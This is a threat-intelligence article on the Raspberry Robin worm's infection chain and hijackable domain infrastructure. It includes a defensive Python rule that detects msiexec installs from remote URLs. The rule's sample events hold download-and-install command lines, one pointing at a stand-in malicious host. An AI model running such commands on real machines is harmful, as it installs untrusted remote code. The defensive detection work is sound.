
Other Hackers can Repurpose Raspberry Robin Botnet's Infrastructure

Raspberry Robin, the worm first observed in September 2021, has kept evolving and adding new techniques to its arsenal. Recent findings show that the botnet's attack infrastructure is not only highly adaptable but can also be hijacked by other cybercriminals, which would extend the threat well beyond its original operators. 

The malware, also tracked as QNAP worm, is attributed to the threat actor tracked as DEV-0856 and is primarily used against finance, government, insurance, and telecom organizations.

Diving into details

SEKOIA identified at least eight virtual private servers hosted on Linode that function as a second command-and-control (C2) layer, likely acting as forward proxies to a further, still unidentified tier.
  • When an infected USB drive is inserted and the Windows shortcut (.LNK) file on it is launched, it invokes the built-in msiexec utility, which downloads the main obfuscated Raspberry Robin payload over HTTP from a compromised QNAP device.
  • Because the infection chain depends on msiexec resolving and fetching from a known set of domains, whoever controls those domains controls what gets installed: the requests can be hijacked to deliver a different, rogue MSI package, either through DNS hijacking or simply by registering the known domains once they expire.
  • The researchers identified over 270 domain names used by this intrusion set, active since the creation of the botnet in July 2021 and still in use at the end of 2022.
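The infection chain above (LNK launches msiexec, msiexec fetches an MSI over HTTP) gives defenders a concrete thing to look for regardless of who currently controls the domains. The following is an added example, not code from SEKOIA, Cyware, or the Raspberry Robin operators: it runs a simple detection over process-creation events and flags any msiexec invocation whose package argument is a remote URL, escalating when the domain is on a watchlist. The sample events, hostnames, and watchlist domains are constructed for illustration and are not real indicators.

```python
"""Flag msiexec installs that pull their package from a remote URL.

Added example, not SEKOIA's or Cyware's code. Sample events and the
watchlist domain are constructed and are not real indicators.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# msiexec named anywhere on the command line: any case, with or without
# ".exe", bare or path-qualified, optionally quoted.
MSIEXEC_RE = re.compile(r'(?:^|[\\/"\s])msiexec(?:\.exe)?(?:"|\s|$)', re.IGNORECASE)
# A remote package reference; msiexec accepts http(s)/ftp URLs for /i.
URL_RE = re.compile(r'"?((?:https?|ftp)://[^\s"]+)"?', re.IGNORECASE)

# Constructed stand-in for a CTI feed of known Raspberry Robin domains.
WATCHLIST = frozenset({"evil-example.test"})

# Constructed events carrying a subset of the fields Sysmon Event ID 1 /
# Security 4688 provide. Only ws-01 and ws-02 should be flagged.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://nas-example.test/update.msi"},
    {"host": "ws-02", "parent": "explorer.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": 'MsIeXeC -Q -I "https://evil-example.test/x"'},
    {"host": "ws-03", "parent": "services.exe",          # benign local install
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i C:\\Users\\a\\Downloads\\7zip.msi /qn"},
    {"host": "ws-04", "parent": "cmd.exe",               # URL, but not msiexec
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c curl http://internal.example.test/file.msi -o a.msi"},
]


@dataclass(frozen=True)
class Finding:
    host: str
    domain: str
    url: str
    severity: str
    reason: str


def msiexec_remote_url(image: str, cmdline: str):
    """Return the remote package URL if this event is msiexec installing
    from a URL, else None. The image path is checked as well as the command
    line so a renamed or oddly-cased invocation is still caught."""
    basename = image.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    if basename != "msiexec.exe" and not MSIEXEC_RE.search(cmdline):
        return None
    m = URL_RE.search(cmdline)
    return m.group(1) if m else None


def detect(events, watchlist=frozenset()):
    """Run the rule over a list of event dicts and return Findings in order."""
    findings = []
    for ev in events:
        url = msiexec_remote_url(ev["image"], ev["cmdline"])
        if url is None:
            continue
        domain = (urlsplit(url).hostname or "").lower()
        if domain in watchlist:
            sev, why = "high", "msiexec fetching package from watchlisted domain"
        else:
            sev, why = "medium", "msiexec installing package from remote URL"
        findings.append(Finding(ev["host"], domain, url, sev, why))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS, WATCHLIST):
        print(f"{f.severity.upper():6} {f.host}: {f.reason} ({f.domain}) {f.url}")
```

The rule deliberately fires on any msiexec remote install, not only on watchlisted domains: the page's point is that the same domains may be answered by a compromised QNAP today and by a hijacker's server tomorrow, so a detection keyed on the behaviour survives both the daily resolution churn and a takeover, while the watchlist only adjusts severity.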

Why this matters

  • The domains in Raspberry Robin's infrastructure resolve to changing IP addresses, moving from one compromised QNAP device to another.
  • New resolutions appear daily, meaning newly compromised QNAP devices are continually added.
  • This churn makes it difficult for defenders to track the infrastructure or neutralize it through sinkholing or tapping.
  • SEKOIA.IO analysts expect Raspberry Robin to remain active even after its domain names expire, because thousands of infected USB thumb drives are still in circulation.
  • That could give the botnet a second life, with other cybercriminals taking over the existing infrastructure by re-registering the expired domains.

That’s not all!

  • Earlier this month, researchers discovered a highly obfuscated Raspberry Robin variant targeting financial and insurance services in Europe. 
  • The protection mechanism in this variant wraps the actual malicious code in at least five layers that must be unpacked before it executes. 
  • In December 2022, the malware was observed using new detection-evasion methods, hiding behind multiple obfuscation layers and a fake payload. 
  • Between October and November 2022, QNAP worm targeted government and telecom entities in Australia, Mexico, India, Argentina, Croatia, Brazil, Italy, Colombia, and France. 

The bottom line

Botnets are versatile: over time they can be repurposed or modified by their operators, or taken over by other groups. The precise origin of Raspberry Robin's initial spread via USB infections remains uncertain, though it is suspected to have relied on other malware for distribution. Continuous monitoring, investigation, and reassessment of this threat are needed to produce actionable cyber threat intelligence.
Cyware Publisher
